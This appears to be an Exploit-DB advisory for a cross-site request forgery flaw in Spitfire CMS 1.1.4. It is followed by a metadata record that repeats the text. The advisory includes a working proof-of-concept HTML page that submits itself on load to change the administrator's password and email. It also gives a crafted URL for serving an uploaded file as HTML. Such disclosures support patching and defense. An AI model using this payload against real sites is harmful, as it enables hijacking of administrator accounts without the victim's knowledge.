###################################################################################################################################
# Exploit Title: spitefire CMS - CSRF / ADD / EDTI / UPLOAD FILE
# Date: 2013 15 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://spitfire.clausmuus.de/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version : 1.1.4
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################
Summary:
========
1. CSRF - Adding/Editing administrator account / UPLOAD FILE
1. CSRF - Adding/Editing administrator account:
===============================================
Spitefire cms ain't a well-coded CMS having many errors and low performance... It is not protected from CSRF as attackers are capable of adding/editing administrators account, or ever uploading a file through CSRF. I'm only giving example of chaning administrator's details:
<html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
action="http://localhost/spitfire_site/cms/edit/tpl_user_settings_action.php" method="post">
<input type="hidden" name="value[password]" value="arian123">
<input type="hidden" name="value[password2]" value="arian123">
<input type="hidden" name="value[email]" value="y.shahinzadeh@gmail.com">
<input type="hidden" name="action" value="save">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>
After issuing exploit, something like that may be appeared:
status = {'values':{'id':'1','realname':'Administrator','username':'admin','password':'','groups':{'all':'7','1':'4'},'may_edit_users':'1','is_admin':'1','status':'0','is_ldap_user':'0','must_change_password':'','email':'admin@admin.net','language':'en'},'messages':{},'quickbar':{'disabledButtons':{'save':'1','redo':'1'}},'statusbar':{'value':' #1'}};
I would expand on upload procedure, at the beginning of the installing site, the author is forced to give a writable directory for saving files, finding the given directory aint much difficult (default is /site/files/). The upload form doesn't have CSRF token so attacker can upload malicious file containing HTML/JAVA codes. The file will be renamed to a file without any extention after uploading, so only client side exploits and attacks can be conducted. Since file_get_contents() function executes file, the attacker must give the crafted URL which is similar to following URL:
http://localhost/spitfire_site/cms/file.php?cms_id=4&name=logo&type=text/html
text/html is the dangerous part because it's set image/gif as default.
/** Yasshar shahinzadeh **/
{"bulletinFamily": "exploit", "id": "EDB-ID:27601", "cvelist": [], "modified": "2013-08-15T00:00:00", "lastseen": "2016-02-03T06:18:46", "edition": 1, "sourceData": "###################################################################################################################################\r\n# Exploit Title: spitefire CMS - CSRF / ADD / EDTI / UPLOAD FILE\r\n# Date: 2013 15 August\r\n# Exploit Author: Yashar shahinzadeh\r\n# Special thanks to Mormoroth\r\n# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir\r\n# Vendor Homepage: http://spitfire.clausmuus.de/\r\n# Tested on: Linux & Windows, PHP 5.2.9\r\n# Affected Version : 1.1.4\r\n#\r\n# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }\r\n###################################################################################################################################\r\n\r\nSummary:\r\n========\r\n1. CSRF - Adding/Editing administrator account / UPLOAD FILE\r\n\r\n\r\n1. CSRF - Adding/Editing administrator account:\r\n===============================================\r\nSpitefire cms ain't a well-coded CMS having many errors and low performance... It is not protected from CSRF as attackers are capable of adding/editing administrators account, or ever uploading a file through CSRF. I'm only giving example of chaning administrator's details:\r\n\r\n<html>\r\n\t<body onload=\"submitForm()\">\r\n\t<form name=\"myForm\" id=\"myForm\"\r\n\taction=\"http://localhost/spitfire_site/cms/edit/tpl_user_settings_action.php\" method=\"post\">\r\n\t<input type=\"hidden\" name=\"value[password]\" value=\"arian123\">\r\n\t<input type=\"hidden\" name=\"value[password2]\" value=\"arian123\">\r\n\t<input type=\"hidden\" name=\"value[email]\" value=\"y.shahinzadeh@gmail.com\">\r\n\t<input type=\"hidden\" name=\"action\" value=\"save\">\r\n\t</form>\r\n\t<script type='text/javascript'>document.myForm.submit();</script>\r\n</html>\r\n\r\nAfter issuing exploit, something like that may be appeared:\r\nstatus = {'values':{'id':'1','realname':'Administrator','username':'admin','password':'','groups':{'all':'7','1':'4'},'may_edit_users':'1','is_admin':'1','status':'0','is_ldap_user':'0','must_change_password':'','email':'admin@admin.net','language':'en'},'messages':{},'quickbar':{'disabledButtons':{'save':'1','redo':'1'}},'statusbar':{'value':' #1'}};\r\n\r\nI would expand on upload procedure, at the beginning of the installing site, the author is forced to give a writable directory for saving files, finding the given directory aint much difficult (default is /site/files/). The upload form doesn't have CSRF token so attacker can upload malicious file containing HTML/JAVA codes. The file will be renamed to a file without any extention after uploading, so only client side exploits and attacks can be conducted. Since file_get_contents() function executes file, the attacker must give the crafted URL which is similar to following URL:\r\n\r\nhttp://localhost/spitfire_site/cms/file.php?cms_id=4&name=logo&type=text/html\r\n\r\ntext/html is the dangerous part because it's set image/gif as default.\r\n\r\n/** Yasshar shahinzadeh **/", "published": "2013-08-15T00:00:00", "href": "https://www.exploit-db.com/exploits/27601/", "osvdbidlist": ["66409"], "reporter": "Yashar shahinzadeh", "hash": "3d150d085f045a45c3bb568bbdc40a1a583176c68e87a3e396e5c78a93245a27", "title": "Spitfire CMS 1.1.4 - CSRF Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Spitfire CMS 1.1.4 - CSRF Vulnerability. Webapps exploit for php platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/27601/", "enchantments": {"vulnersScore": 6.8}}